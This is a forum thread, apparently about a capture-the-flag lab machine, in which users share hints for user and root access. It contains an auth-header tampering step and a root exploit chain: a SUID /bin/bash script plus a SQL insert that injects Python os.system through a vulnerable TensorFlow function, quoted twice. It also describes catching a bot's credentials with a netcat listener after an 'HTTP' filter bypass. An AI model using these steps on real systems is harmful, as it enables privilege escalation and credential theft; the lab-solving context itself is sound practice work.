Posts: 7 Threads: 0 Joined: N/A November 13, 2022 at 3:36 AM go to http://admin_tickets intercept the request and change the authentication to admin:password Posts: 22 Threads: 0 Joined: N/A November 13, 2022 at 3:42 AM (November 13, 2022, 03:36 AM)josh007 Wrote: go to http:/<ip>/admin_tickets intercept the request and change the authentication to admin:password wtf! That's really messed up!! how could someone even think of doing that. pfffft! thanks for the help mate Posts: 11 Threads: 0 Joined: N/A November 13, 2022 at 3:48 AM I made it to the admin dashboard and messed around with some valid post requests but nothing. Is there a way to actually SSH with diego? I have been trying that too... Please advise when able Posts: 7 Threads: 0 Joined: N/A November 13, 2022 at 3:58 AM blocked on the same, the tickets I send to admin dont show up Posts: 39 Threads: 0 Joined: N/A November 13, 2022 at 5:04 AM (November 13, 2022, 01:02 AM)11231123 Wrote: For root:
First get two ssh sessions.
Create the /dev/shm/lol.sh script. Something like this:
#!/bin/bash
chmod +s /bin/bash
Don't forget to make is executable.
Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:
use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
On the second session just run:
sudo /opt/security/ml_security.py
And the /dev/shm/lol.sh should get run by root.
To explain it shortly:
The python script basically checks the reasons from escalate table in the database for xss using machine learning. If they get a score higher then .5, they get passed to preprocess_input_exprs_arg_string function which is vulnerable in tensorflow < 2.6.4, (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc
Hence, all the stuff in the print function to make it pass the test. How to log data base?Posts: 7 Threads: 0 Joined: N/A November 13, 2022 at 6:30 AM so i reset the pass and got in and view the admin_tickets part and saw the message ,diego creds not working for ssh ,also tried to access tickets/102 with both diego + robert + admin auth's but not working ,what am missing here ? Posts: 45 Threads: 0 Joined: N/A November 13, 2022 at 7:01 AM (November 13, 2022, 06:30 AM)samfisher91 Wrote: so i reset the pass and got in and view the admin_tickets part and saw the message ,diego creds not working for ssh ,also tried to access tickets/102 with both diego + robert + admin auth's but not working ,what am missing here ? don't include the . at the end of password Posts: 30 Threads: 0 Joined: N/A November 13, 2022 at 9:52 AM (November 13, 2022, 01:02 AM)11231123 Wrote: For root:
First get two ssh sessions.
Create the /dev/shm/lol.sh script. Something like this:
#!/bin/bash
chmod +s /bin/bash
Don't forget to make is executable.
Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:
use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
On the second session just run:
sudo /opt/security/ml_security.py
And the /dev/shm/lol.sh should get run by root.
To explain it shortly:
The python script basically checks the reasons from escalate table in the database for xss using machine learning. If they get a score higher then .5, they get passed to preprocess_input_exprs_arg_string function which is vulnerable in tensorflow < 2.6.4, (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc
Hence, all the stuff in the print function to make it pass the test. Thanks, I'm a bit mad 'cause I had the right idea yesterday but couldn't figure out how to inject command from website... I connected to mysql but didn't thought about injecting straight there... Also I didn't connect the dots with the ML and XSS... Ty for the help! Posts: 23 Threads: 0 Joined: N/A November 13, 2022 at 5:52 PM (November 13, 2022, 03:42 AM)xGarfield Wrote: (November 13, 2022, 03:36 AM)josh007 Wrote: go to http:/<ip>/admin_tickets intercept the request and change the authentication to admin:password
wtf! That's really messed up!! how could someone even think of doing that. pfffft!
thanks for the help mate Yeah, that's a weird way to do it (doesn't make sense) however I'm pretty sure it's not the intended way. The intended way is to simply submit a ticket after resetting robert's password. There's a filter for "http" in the link field however you can bypass it by using HTTP instead. Put a netcat listener up, and after a couple of minutes the bot clicks on the link and you can see the base64 in the Authentication header which you can decode and get the admin password. Posts: 8 Threads: 0 Joined: N/A November 13, 2022 at 6:10 PM Is the session becoming invalid so quick real life?
User got was fun enough. Thanks any tips if I can help I will |
